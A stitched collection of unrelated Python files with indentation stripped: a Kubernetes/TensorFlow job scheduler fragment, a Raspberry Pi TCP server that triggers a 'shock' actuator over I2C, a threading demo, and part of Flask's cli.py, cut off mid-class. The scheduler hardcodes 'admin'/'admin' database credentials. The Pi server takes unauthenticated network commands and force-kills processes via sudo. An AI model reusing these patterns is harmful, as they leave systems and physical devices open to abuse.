tasks['count'] += 1
pool.apply_async(catch_node_step_msg,
args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
elif tasks['count'] >= tasks['size']:
worker_buffer = tasks['buffer']
worker_buffer.append(job.name)
tasks['buffer'] = worker_buffer
tmp_buffer_count = tasks['buffercount']
tmp_buffer_count = tmp_buffer_count+1
tasks['buffercount'] = tmp_buffer_count
else:
worker_buffer = tasks['buffer']
worker_buffer.append(job.name)
tmp_buffer_count = tasks['buffercount']
tmp_buffer_count = tmp_buffer_count + 1
tasks['buffercount'] = tmp_buffer_count
node_index, cpu_nodes, memory_nodes, total_cpu_use, total_mem_use = job_basic.schedule_base()
cpu_value, mem_value, cpu_node_value, mem_node_value = get_load_value(node_index=node_index,cpu_base=cpu_nodes,memory_base=memory_nodes,total_cpu_base=total_cpu_use,total_memory_base=total_mem_use)
if cpu_value < 0.4:
selected = False
for job_name in worker_buffer:
rea = max_free_heap.add(job_name)
if rea is not None:
selected_job_name = rea
selected = True
break
if not selected:
selected_job_name = max_free_heap.items[0]
print(selected_job_name)
worker_buffer = max_free_heap.items
print(worker_buffer)
if not selected:
ceshi_name = worker_buffer.pop(0)
# tmp_buffer = tasks['buffer']
# tmp_buffer.remove(selected_job_name)
print(ceshi_name)
tasks['buffer'] = worker_buffer[:]
# tmp_buffer_size =
max_free_heap.clear()
if selected:
tasks['buffercount'] = max_buffer_size
else:
tmp_buffer_count = tmp_buffer_count - 1
tasks['buffercount'] = tmp_buffer_count
else:
selected = False
for job_name in worker_buffer:
# max_wight_heap
rea = max_wight_heap.add(job_name)
if rea is not None:
selected_job_name = rea
selected = True
break
if not selected:
selected_job_name = max_wight_heap.items[0]
worker_buffer = max_wight_heap.items
print(worker_buffer)
print(selected_job_name)
if not selected:
ceshi_name = worker_buffer.pop(0)
# tmp_buffer = tasks['buffer']
# tmp_buffer.remove(selected_job_name)
print(ceshi_name)
tasks['buffer'] = worker_buffer[:]
# tmp_buffer_size =
max_wight_heap.clear()
if selected:
tasks['buffercount'] = max_buffer_size
else:
tmp_buffer_count = tmp_buffer_count - 1
tasks['buffercount'] = tmp_buffer_count
job = reload_jobs(selected_job_name, -1)
if cpu_value < 0.4:
job.worker_replicas = random.randint(4, 6)
elif cpu_value < 0.7:
job.worker_replicas = random.randint(3, 4)
else:
job.worker_replicas = random.randint(1, 2)
job.ps_replicas = random.randint(math.ceil(job.worker_replicas / 4),
math.ceil(job.worker_replicas / 2))
save_job_change_layout(job.name, job.ps_replicas, job.worker_replicas)
mem_need = job.total_mem * total_mem_use + job.worker_replicas * job.memory_allocate + 2048 * job.ps_replicas
cpu_need = job.total_cpu * total_cpu_use + job.worker_replicas * job.cpu_allocate + 1000 * job.ps_replicas
catch_worker = 0
catch_ps = 0
node_keys = cpu_nodes.keys()
reach_ps = False
reach_worker = False
for key in node_keys:
catch_ps_c = 0
catch_ps_m = 0
catch_worker_c = 0
catch_worker_m = 0
can_use_cpu = job.node_cpu[key] * (1 - cpu_nodes[key])
can_use_mem = job.node_memory[key] * (1 - memory_nodes[key])
first_try = True
endcpu = False
endmem = False
while (not endcpu) or (not endmem):
if first_try:
if can_use_cpu - 1000 > 0 and not reach_ps:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
if can_use_cpu - job.cpu_allocate > 0 and not reach_worker:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
if can_use_mem - 2048 > 0 and not reach_ps:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
if can_use_mem - job.memory_allocate > 0 and not reach_worker:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
first_try = False
else:
if can_use_cpu - job.cpu_allocate > 0 and not reach_worker:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
else:
if can_use_cpu - 1000 > 0 and not reach_ps:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
endcpu = True
if can_use_mem - job.memory_allocate > 0 and not reach_worker:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
else:
if can_use_mem - 2048 > 0 and not reach_ps:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
endmem = True
if catch_worker_c < catch_worker_m:
catch_worker += catch_worker_c
else:
catch_worker += catch_worker_m
if catch_ps_c < catch_ps_m:
catch_ps += catch_ps_c
else:
catch_ps += catch_ps_m
if catch_ps >= job.ps_replicas:
reach_ps = True
if catch_worker >= job.worker_replicas:
reach_worker = True
if catch_ps >= job.ps_replicas and catch_worker >= job.worker_replicas:
break
print("catch_ps: %d catch_worker: %d" % (catch_ps, catch_worker))
if catch_ps < job.ps_replicas or catch_worker < job.worker_replicas:
if catch_ps > 0 and catch_worker > 0:
if catch_worker > job.worker_replicas:
catch_worker = job.worker_replicas
if catch_ps > job.ps_replicas:
catch_ps = job.ps_replicas
job.ps_replicas = catch_ps
job.worker_replicas = catch_worker
save_job_change_layout(job.name, catch_ps, catch_worker)
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
tasks['count'] += 1
pool.apply_async(catch_node_step_msg,
args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
else:
job.ps_replicas = 1
job.worker_replicas = 1
save_job_change_layout(job.name,1,1)
tasks['next'] = job.name
else:
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
tasks['count'] += 1
pool.apply_async(catch_node_step_msg,
args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
tmp_reload = tasks['reload']
tmp_reload = tmp_reload + 1
if tmp_reload == 6:
tmp_reload = 0
tasks['reload'] = tmp_reload
# ns_tmp = tasks['ns']
# ns_tmp.append(job.name)
# tasks['ns'] = ns_tmp
# # job_tmp = tasks['job']
# # job_tmp[job.name] = job
# # tasks['job'] = job_tmp
# is_layout = tasks['nslayout']
# is_layout[job.name] = False
# tasks['nslayout'] = is_layout
# jobs.append(job.name)
# tasks['count'] += 1
# pool.apply_async(catch_node_step_msg,args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res,1))
lock.release()
def save_config(config,filename):
config_content = {}
for key,value in config.items():
# if key != 'job' and key != 'ns':
config_content[key] = value
# task_content['task_id'] = tasks['task_id']
fw = open(filename, 'w', encoding='utf-8')
# ensure_ascii:默认值True,如果dict内含有non-ASCII的字符,则会类似\uXXXX的显示数据,设置成False后,就能正常显示
dic_json = json.dumps(config_content, ensure_ascii=False, indent=4) # 字典转成json,字典转成字符串
fw.write(dic_json)
fw.close()
def jiance(tasks,lock):
while True:
if tasks['start']==True:
time.sleep(120)
lock.acquire()
save_config(tasks,'system_info.json')
lock.release()
print('saved configs')
time.sleep(120)
else:
break
def save_job_change_layout(job_name,ps_n,worker_n):
save_job_path = '/tfdata/k8snfs/%s/%s.json' % (job_name, job_name)
job_config = load_config(save_job_path)
# 'ps_replicas': job.ps_replicas,'worker_replicas': job.worker_replicas
job_config['ps_replicas'] = ps_n
job_config['worker_replicas'] = worker_n
save_config(job_config, save_job_path)
def save_job_change_resource(job_name,cpu_allocate,mem_allocate):
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job_name, job_name)
job_res_config = load_config(save_res_path)
# save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job.name, job.name)
# save_config(job_config, save_job_path)
job_res_config['cpu_source'] = cpu_allocate
job_res_config['mem_source'] = mem_allocate
save_config(job_res_config, save_res_path)
def read_step_base(job_name):
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job_name, job_name)
job_res_config = load_config(save_res_path)
key = job_res_config.keys()
key_list = list(key)
if 'step_base' not in key_list:
job_res_config['step_base'] = 0
step_base = job_res_config['step_base']
return int(step_base)
def write_step_base(job_name,step_base):
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job_name, job_name)
job_res_config = load_config(save_res_path)
job_res_config['step_base'] = step_base
save_config(job_res_config,save_res_path)
print("save step base successfully!!!")
def reload_jobs(job_name,task_id):
#full_flie_name = '/tfdata/tfcnn/expjob/%s.yaml' % job_name
save_job_path = '/tfdata/k8snfs/%s/%s.json' % (job_name, job_name)
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job_name, job_name)
# with open(full_flie_name,'r') as yaml_job:
#job_obj = yaml.load(yaml_job.read())
job_config = load_config(save_job_path)
job_res_config = load_config(save_res_path)
params_dic = {}
keys = job_config.keys()
for key in keys:
params_dic[key] = job_config[key]
# params_dic['v1'] = v1
if task_id != -1:
params_dic['task_id'] = task_id
params_dic['rtimes'] = task_id
if job_config['template_id'] == 1:
job_reload = VGGTask(**params_dic)
elif job_config['template_id'] == 2:
job_reload = RESTask(**params_dic)
elif job_config['template_id'] == 3:
job_reload = RETask(**params_dic)
elif job_config['template_id'] == 4:
job_reload = XCETask(**params_dic)
else:
job_reload = DENTask(**params_dic)
# job_reload.template = job_obj
#job_res_config = {'deadline':job.deadline,'start_time':job.starttime,'cpu_source':job.cpu_allocate,
# 'mem_source':job.memory_allocate,'cpu_high':cpu_base}
job_reload.cpu_allocate = job_res_config['cpu_source']
job_reload.memory_allocate = job_res_config['mem_source']
job_reload.deadline = job_res_config['deadline']
job_reload.starttime = job_res_config['start_time']
return job_reload
# job_name_list = job_name.split('-')
# job = VGGTask()
def load_config(config_file):
# # json串是一个字符串
# f = open('product.json', encoding='utf-8')
# res = f.read()
# product_dic = json.loads(res) # 把json串,变成python的数据类型,只能转换json串内容
# print(product_dic)
# print(product_dic['iphone'])
# # t = json.load(f)
# # print(t) #传一个文件对象,它会帮你直接读json文件,并转换成python数据
# # print(t['iphone'])
# f.close()
f = open(config_file,encoding='utf-8')
res = f.read()
config_content = json.loads(res)
return config_content
if __name__ == '__main__':
kubernetes.config.load_kube_config()
v1 = kubernetes.client.CoreV1Api()
# v1.list_node()
mgr = multiprocessing.Manager()
tasks = mgr.dict()
lock = mgr.Lock()
jobs = mgr.list()
config_content = load_config('system_info.json')
for key,value in config_content.items():
tasks[key] = value
print(tasks)
for ns in tasks["ns"]:
# job_reload = reload_jobs(ns,-1)
jobs.append(ns)
# tasks['ns'] = []
# tasks['job'] = {}
q = multiprocessing.Manager().Queue(maxsize=tasks['size'])
tasks['start'] = True
# print(tasks)
# print(type(tasks))
# task_content = {}
# task_content['task_id'] = [0,0,0,0,0]
# task_content['rtimes'] = [0,0,0,0,0]
# task_content['size'] = 3
# task_content['training_step'] = [80,80,80,80,80]
# task_content['ps_replicas'] = [2, 2, 2, 2, 2]
# task_content['count'] = 0
# task_content['worker_replicas'] = [4, 4, 4, 4, 4]
# task_content['training_step'] = [80, 80, 80, 80, 80]
# task_content['interval'] = [1.0, 1.0, 1.0, 0.5, 1.0]
# task_content['batch_size'] = [128, 128, 128, 128, 128]
# task_content['tag'] = ["ms", "ms", "ms", "ms", "ms"]
# save_config(task_content)
# print(tasks.items())
# print(type(tasks['task_id']))
# task_content['task_id'] = tasks['task_id']
# fw = open('system_info.json', 'w', encoding='utf-8')
# # ensure_ascii:默认值True,如果dict内含有non-ASCII的字符,则会类似\uXXXX的显示数据,设置成False后,就能正常显示
# dic_json = json.dumps(task_content, ensure_ascii=False, indent=4) # 字典转成json,字典转成字符串
# fw.write(dic_json)
# fw.close()
url = 'https://192.168.128.10:6443/apis/metrics.k8s.io/v1beta1/nodes'
args = parse()
client = influxdb.InfluxDBClient('192.168.128.10', port=8086, username='admin', password='admin',
database=args.database)
# node_p = Node_mess(url=url,derivation=10,args=args)
node_p = Node_mess(url=url, args=args,tasks=tasks,v1=v1)
# Submit_job(tasks=,lock=,v1=,jobs=)
# Monitor_job(tasks,lock,v1,jobs)
submit_p = multiprocessing.Process(target=Submit_job,args=(tasks,lock,v1,jobs))
monitor_p = multiprocessing.Process(target=Monitor_job,args=(tasks,lock,v1,jobs))
jiance_p = multiprocessing.Process(target=jiance, args=(tasks, lock))
# derivation
node_p.daemon = True
# submit_p.daemon = True
# monitor_p.daemon = True
jiance_p.daemon = True
k1 = os.getpid()
# v1.list_namespace(timeout=)
k2 = multiprocessing.current_process().pid
# v1.delete_namespace()
print(k1, k2)
while True:
boots = input("Please Input 'start' to start:\n")
if boots == 'start':
time_open = math.ceil(time.time())
tmp_list = tasks["creation"]
tmp_list.append(time_open)
tasks["creation"] = tmp_list
node_p.start()
submit_p.start()
monitor_p.start()
jiance_p.start()
if boots == 'end':
tasks['start'] = False
time.sleep(10)
submit_p.join()
monitor_p.join()
if tasks['count']>0:
for ns in tasks['ns']:
print(tasks['ns'])
print("deal ns:"+ns)
pod_status = [i.status.phase for i in v1.list_namespaced_pod(ns).items]
if 'Succeeded' in pod_status or 'Failed' in pod_status:
time.sleep(float(random.randint(3, 10)))
lock.acquire()
ns_tmp = tasks['ns']
command = 'kubectl delete -f /tfdata/tfcnn/expjob/'+ns+'.yaml'
os.system(command)
v1.delete_namespace(ns)
# tasks['job'][ns].delete_tf()
ns_tmp.remove(ns)
tasks['ns'] = ns_tmp
is_layout = tasks['nslayout']
print("is layout: \n")
print(is_layout)
is_layout.pop(ns)
tasks['nslayout'] = is_layout
print("after deal: \n")
print(tasks['nslayout'])
# tasks['job'].pop(ns)
tasks['count'] = len(ns_tmp)
print(tasks['count'])
lock.release()
time.sleep(5)
time_last = math.ceil(time.time())
tmp_list = tasks['endtime']
tmp_list.append(time_last)
tasks["endtime"] = tmp_list
save_config(tasks,filename='system_info.json')
print('System end!')
break
|
semiActiveServer.py
|
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import subprocess
from time import sleep
import smbus
import time
# for RPI version 1, use "bus = smbus.SMBus(0)"
bus = smbus.SMBus(1)
def acceptConnections():
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
Thread(target=handle_client, args=(client, )).start()
def StringToBytes(val):
retVal = []
for c in val:
retVal.append(ord(c))
return retVal
def handle_reading_pressure(client, addr, value):
block = bus.read_word_data(addr, value)
client.send(block)
def handle_activating_shock(client, addr, value):
bus.write_i2c_block_data(int(addr), 0x00, StringToBytes(value))
client.send('Successfully activated shock ', value)
def handle_client(client):
while True:
data = client.recv(4096)
payload = data.split(',')
addr = payload[0]
value = payload[1]
if payload[0] == '*':
handle_reading_pressure(client, 30, value)
if payload[0] == '+':
handle_activating_shock(client, 30, value)
clients = {}
HOST = ''
PORT = '6789'
BUFSIZ = 4096
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
while True:
try:
SERVER.bind(ADDR)
break
except:
subprocess.call(
' sudo lsof -t -i tcp:9090 | xargs kill -9', shell=True)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=acceptConnections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
|
threading_daemon_join_timeout.py
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import threading
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s')
def daemon():
logging.debug('Starting')
time.sleep(2)
logging.debug('Exiting')
def non_daemon():
logging.debug('Starting')
logging.debug('Exiting')
d = threading.Thread(name='daemon', target=daemon)
d.setDaemon(True)
t = threading.Thread(name='non-daemon', target=non_daemon)
d.start()
t.start()
# d.join(1)
d.join(3)
print 'd.isAlive()', d.isAlive()
t.join()
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: 2010 Pallets
:license: BSD-3-Clause
"""
from __future__ import print_function
import ast
import inspect
import os
import platform
import re
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from ._compat import getargspec
from ._compat import itervalues
from ._compat import reraise
from ._compat import text_type
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in itervalues(module.__dict__) if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
"one.".format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
"could not call it without arguments. Use "
"\"FLASK_APP='{module}:{factory}(args)'\" to specify "
"arguments.".format(factory=attr_name, module=module.__name__)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(module=module.__name__)
)
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if "script_info" in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
# explicitly delete tb as it is circular referenced
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from . import Flask
match = re.match(r"^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$", app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
"expression.".format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval("({args},)".format(args=args))
except (ValueError, SyntaxError) as e:
raise NoAppException(
"Could not parse the arguments in "
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
"be called with the specified arguments.".format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from "
'"{module}:{app_name}".'.format(module=module.__name__, app_name=app_name)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
"\n\n{tb}".format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException('Could not import "{name}".'.format(name=module_name))
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
message = "Python %(python)s\nFlask %(flask)s\nWerkzeug %(werkzeug)s"
click.echo(
message
% {
"python": platform.python_version(),
"flask": __version__,
"werkzeug": werkzeug.__version__,
},
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path)
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(" * Environment: {0}".format(env))
if env == "production":
click.secho(
" WARNING: This is a development server. "
"Do not use it in a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(" * Debug mode: {0}".format("on" if debug else "off"))
class CertParamType(click.ParamType):
